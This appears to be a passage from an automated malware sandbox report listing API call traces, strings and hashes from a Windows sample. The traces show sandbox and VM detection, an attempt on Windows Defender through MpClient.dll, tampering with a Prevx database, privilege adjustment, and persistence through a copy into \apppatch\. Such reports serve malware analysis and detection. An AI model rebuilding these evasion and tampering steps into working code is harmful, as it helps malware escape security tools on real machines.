                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                            • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                            • API String ID: 1431998568-3499098167
                                                                                                                                                                                                            • Opcode ID: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                            • Instruction ID: bae6937ecf4d77d63e68da0d133f8e08c9265e2213eddde9df9132157c3c9a9d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A841B8B1944218ABDB20DB54CD89FDF7B7C9B84705F1440AAE704B61C0D779AB448F98
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                            • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                            • API String ID: 33631002-3172865025
                                                                                                                                                                                                            • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                            • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                            • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004,00000000,?,00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401285
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHeap$Process$AllocateChangeCloseCreateFindFreeHandleInformationLockNotificationPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                            • String ID: G,@
                                                                                                                                                                                                            • API String ID: 213124939-3313068137
                                                                                                                                                                                                            • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                            • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 00402157
                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402166
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                            • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                            • API String ID: 1010965793-1794910726
                                                                                                                                                                                                            • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                            • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00401150: CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                              • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                              • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                              • Part of subcall function 00401150: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                              • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                              • Part of subcall function 00401150: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                              • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                              • Part of subcall function 00401150: ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                              • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                              • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                              • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                              • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                              • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$Process$FreeValidate$AddressAllocateCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                            • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 3168189189-905597979
                                                                                                                                                                                                            • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                            • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 004028BE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                            • String ID: Windows Explorer
                                                                                                                                                                                                            • API String ID: 1140695583-228612681
                                                                                                                                                                                                            • Opcode ID: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                            • Instruction ID: b52a01207190e4a30f96b10a649eeabca6697c1dd3b0d782d0755018a236c0da
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E714175A006169FCB10EB99CD88DAFB7B9AF88300B24816AE504F73D0D7B5ED42CB54
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                            • AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Token$CurrentOpenProcessThread$AdjustChangeCloseErrorFindLastLookupNotificationPrivilegePrivilegesValue
                                                                                                                                                                                                            • String ID: SeSecurityPrivilege
                                                                                                                                                                                                            • API String ID: 348569255-2333288578
                                                                                                                                                                                                            • Opcode ID: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                            • Instruction ID: 2f4dd94adce221d10feffccf969df1866f37505423b255349c6b180ac4db3a06
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92113CB6A00205ABE710DBE0DE0DFAF7B7CAB84B41F104129BB05F61D0D7749A04C7A9
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                            • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                            • API String ID: 3225117150-898603304
                                                                                                                                                                                                            • Opcode ID: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                            • Instruction ID: f0829fbf90d271a43df41d43683be69a37a07176176bc6acbc5691eaf7b0b3d2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA31F2B1C0121CAFDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,76A8DB30), ref: 00402AAB
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                            • PathFileExistsA.KERNELBASE(?), ref: 00402AE4
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                              • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                              • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                              • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                              • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                              • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                              • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                            • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                            • API String ID: 4049655197-3112416296
                                                                                                                                                                                                            • Opcode ID: 66aefa0bda43174da8d304fb35afc24c9e162c35573b710bb5f0be43539d63f7
                                                                                                                                                                                                            • Instruction ID: 5ff553944d99263ee06e3162097b0b7c6440a9b95b570a66abc1ee1896f9e821
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66aefa0bda43174da8d304fb35afc24c9e162c35573b710bb5f0be43539d63f7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28716FB15043419BC710EF609E9C96BBBE8BBD8300F44493EF786B72A1DB749944CB99
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • Part of subcall function 00401E00: FindCloseChangeNotification.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                            • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Security$DescriptorToken$ChangeCloseCurrentFindNotificationOpenProcessThread$AdjustConvertCreateErrorFreeHandleInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                            • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 1779852708-820036962
                                                                                                                                                                                                            • Opcode ID: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                            • Instruction ID: e082a392c3e1c8ea6bcbabec48e58df7c8b9917df2aee0f20a935e5e0ee169a7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4518E715093806FE7128B609D18BAA3FB99F47701F1941EBE680FA1E3D27C4D49C769
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                            • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                            • API String ID: 606440919-2829233815
                                                                                                                                                                                                            • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                            • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
